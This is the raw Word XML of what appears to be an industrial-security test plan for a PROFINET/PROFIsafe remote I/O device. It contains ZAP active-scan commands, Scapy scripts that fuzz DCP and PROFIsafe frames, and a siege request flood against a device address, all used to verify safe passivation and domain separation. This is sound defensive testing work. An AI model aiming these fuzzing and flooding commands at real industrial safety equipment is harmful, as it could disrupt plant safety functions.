          <w:p w14:paraId="64DFC45B" w14:textId="013D4319" w:rsidR="00E60591" w:rsidRPr="006D5B99"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Log every input that changes device state; root-cause each.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4051E9FD" w14:textId="77777777" w:rsidR="00FB3AFF"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malformed inputs are safely rejected or resolve to passivation, with no crash into an undefined/hazardous state. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D411EEF" w14:textId="06D54F5A" w:rsidR="00E60591" w:rsidRPr="006D5B99"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malformed input causes a hang, an uncommanded output, or an unrecoverable state other than the defined safe state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76530DAA" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="006D5B99" w:rsidRDefault="00E60591" w:rsidP="00E60591">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B403B5A" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="006D5B99" w:rsidRDefault="00E60591" w:rsidP="00E6059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478"/>
        <w:gridCol w:w="187"/>
        <w:gridCol w:w="7623"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E60591" w:rsidRPr="006D5B99" w14:paraId="7EACCADF" w14:textId="77777777" w:rsidTr="00B16D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1A31CAA2" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="006D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7808" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="033761BA" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="006D5B99"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E60591" w:rsidRPr="006D5B99" w14:paraId="7BDB8623"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gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="45EFD6F5" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="006D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Ref. Test </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D164ED8" w14:textId="67E0C3CD" w:rsidR="00E60591" w:rsidRPr="006D5B99" w:rsidRDefault="005179E1"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TC-RQ010-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000812E3" w:rsidRPr="006D5B99" w14:paraId="604674E9"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2FB5EC78" w14:textId="77777777" w:rsidR="000812E3" w:rsidRPr="006D5B99" w:rsidRDefault="000812E3" w:rsidP="000812E3">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7808" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="713D85E4" w14:textId="685FEA91"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 NV1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000812E3" w:rsidRPr="006D5B99" w14:paraId="29BA247F"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9FFFCDE" w14:textId="77777777" w:rsidR="000812E3" w:rsidRPr="006D5B99" w:rsidRDefault="000812E3" w:rsidP="000812E3">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7808" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="3C948B8B" w14:textId="7B5674AF"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boofuzz (CM-010), ZAP/zaproxy (CM-004), Scapy (DCP fuzzing).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000812E3" w:rsidRPr="006D5B99" w14:paraId="7AF0565A" w14:textId="77777777" w:rsidTr="00B16D92">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6516DD2C" w14:textId="77777777" w:rsidR="000812E3" w:rsidRPr="006D5B99" w:rsidRDefault="000812E3" w:rsidP="000812E3">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7808" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="3EC7578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0076D7B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IoT-Core/HTTP fuzzing (CM-004 pattern):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3DC43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zaproxy -daemon -host 127.0.0.1 -port 8090 -config api.disablekey=true &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E9C87A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"http://127.0.0.1:8090/JSON/spider/action/scan/?url=http://$SRIO/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="360D27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"http://127.0.0.1:8090/JSON/ascan/action/scan/?url=http://$SRIO/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319E053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"http://127.0.0.1:8090/OTHER/core/other/htmlreport/" -o cm_rq010-03_zap_report.html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163ADD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pt-BR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B42262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PROFINET DCP fuzzing (custom Scapy script, no TCP transport):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63BDDCD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cm_rq010-03_dcp_fuzz.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05CCF8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58827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15915BE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047F9CD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2EB18C0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6C549AF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length = random.randint(1, 300)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C8D93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fuzz_payload = bytes([random.randint(0, 255) for _ in range(length)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28418F03"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type=0x8892)/Raw(load=fuzz_payload),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="761827E0"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17BEA8A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0858ADEB"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cm_rq010-03_dcp_fuzz.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D14BA0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2F319E72"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PROFIsafe frame fuzzing (reuse the byte layout from TC-RQ001-03,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D9857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randomize individual fields):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78648C4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cm_rq010-03_safety_fuzz.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44664C85"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import random</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2392642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4219243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598EB847"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53407061"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base = bytearray.fromhex("REPLACE_WITH_CAPTURED_PROFISAFE_PAYLOAD_HEX")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A242B5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range(200):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A00E0A"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 = bytearray(base)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F475026"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idx = random.randrange(len(mutated))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DDABCAF"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mutated[idx] = random.randint(0, 255)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B85819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sendp(Ether(dst=target_mac, type=0x8892)/Raw(load=bytes(mutated)),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC8FC48"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verbose=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7883372F" w14:textId="10B2E5EC" w:rsidR="000812E3" w:rsidRPr="006D5B99" w:rsidRDefault="000812E3" w:rsidP="00AE71C6">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4926"/>
              </w:tabs>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r w:rsidR="00AE71C6">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE90EE4"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cm_rq010-03_safety_fuzz.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73ED34BD"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p>
          <w:p w14:paraId="6E0D36C9" w14:textId="77777777" w:rsidR="000812E3" w:rsidRPr="006D5B99" w:rsidRDefault="000812E3" w:rsidP="000812E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4. During all runs, continuously observe SRIO state (LEDs, TIA watch</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392FD44D" w14:textId="0BFBAE3D" w:rsidR="000812E3" w:rsidRPr="006D5B99" w:rsidRDefault="000812E3" w:rsidP="000812E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table, diagnostics buffer); log every crash/hang.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000812E3" w:rsidRPr="006D5B99" w14:paraId="5DF7A35D" w14:textId="77777777" w:rsidTr="00B16D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712DA65D" w14:textId="50F91E28" w:rsidR="000812E3" w:rsidRPr="006D5B99" w:rsidRDefault="000812E3" w:rsidP="000812E3">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7808" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7F543EBC" w14:textId="1E91B0D3" w:rsidR="000812E3" w:rsidRPr="006D5B99" w:rsidRDefault="000812E3" w:rsidP="000812E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all malformed inputs are safely rejected or resolve to </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>controlled passivation; no hang/crash into an undefined state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35A6F228" w14:textId="69FB24EE" w:rsidR="006761B9" w:rsidRPr="006D5B99" w:rsidRDefault="006761B9" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FCF6BC" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096FB21D" w14:textId="21B50459" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00DA6C1D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1F42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ010-04 - </w:t>
      </w:r>
      <w:r w:rsidR="00F12C94" w:rsidRPr="001B1F42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Application-Layer Flood &amp; Domain-Separation Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D10C094" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00DA6C1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6D5B99"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1658FED1"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64DB8397" w14:textId="6D637B7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Pr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.2 / CR 5.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset F, Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E5555CE" w14:textId="7C5B62A3"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Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B263485" w14:textId="733AC4AB" w:rsidR="00DA6C1D" w:rsidRPr="006D5B9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DA6C1D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DB3EA2F" w14:textId="763B41A5" w:rsidR="00DA6C1D" w:rsidRPr="006D5B9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Apply an application-layer request flood to the non-safety interface and confirm the attack does not propagate to the safety path (domain separation holds).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12BA3CBD"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Establish normal operating state.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB8CEB1" w14:textId="77777777" w:rsidR="002F6A54"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an application-layer request flood to the non-safety interface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="695A029C" w14:textId="05DE2057" w:rsidR="00DA6C1D" w:rsidRPr="006D5B9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Monitor the safety path (qualifier, outputs, safe communication) throughout.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DE41DB6" w14:textId="77777777" w:rsidR="002F6A54"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safety path is unaffected (no passivation caused by, and no propagation of, the non-safety-path flood). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F35D280" w14:textId="32F4A17E" w:rsidR="00DA6C1D" w:rsidRPr="006D5B9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the non-safety-path flood degrades or disturbs the safety function.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DEEADAF" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00DA6C1D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3889E43F" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00DA6C1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6D5B99"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EC45805" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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A6C1D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="452B2E56" w14:textId="37A3FE9E" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1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TC-RQ010-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F207B7" w:rsidRPr="006D5B99"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F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="038E0B21" w14:textId="436C06D7" w:rsidR="00F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B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t>NV</w:t>
            </w:r>
            <w:r w:rsidR="00B16D92" w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F207B7" w:rsidRPr="006D5B99"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F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C8C5D16" w14:textId="1CA2913B" w:rsidR="00F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B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Siege (CM-009), curl.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F207B7" w:rsidRPr="006D5B99"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F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23AA4BB1" w14:textId="77777777" w:rsidR="00F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t>export SRIO=192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5726952C" w14:textId="77777777" w:rsidR="00F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t>siege -c 100 -t 10M -v http://$SRIO/deviceinfo/getdata -l cm_rq010-04_siege.log &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E35AAF2" w14:textId="77777777" w:rsidR="00F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">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parallel, observe the PROFIsafe connection / safety function in TIA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B4D10AD" w14:textId="6BEC10AE" w:rsidR="00F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">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 (watch table: qualifier, outputs).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F207B7" w:rsidRPr="006D5B99"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0CF329DA" w:rsidR="00F207B7" w:rsidRPr="006D5B99" w:rsidRDefault="00F207B7" w:rsidP="00F207B7">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
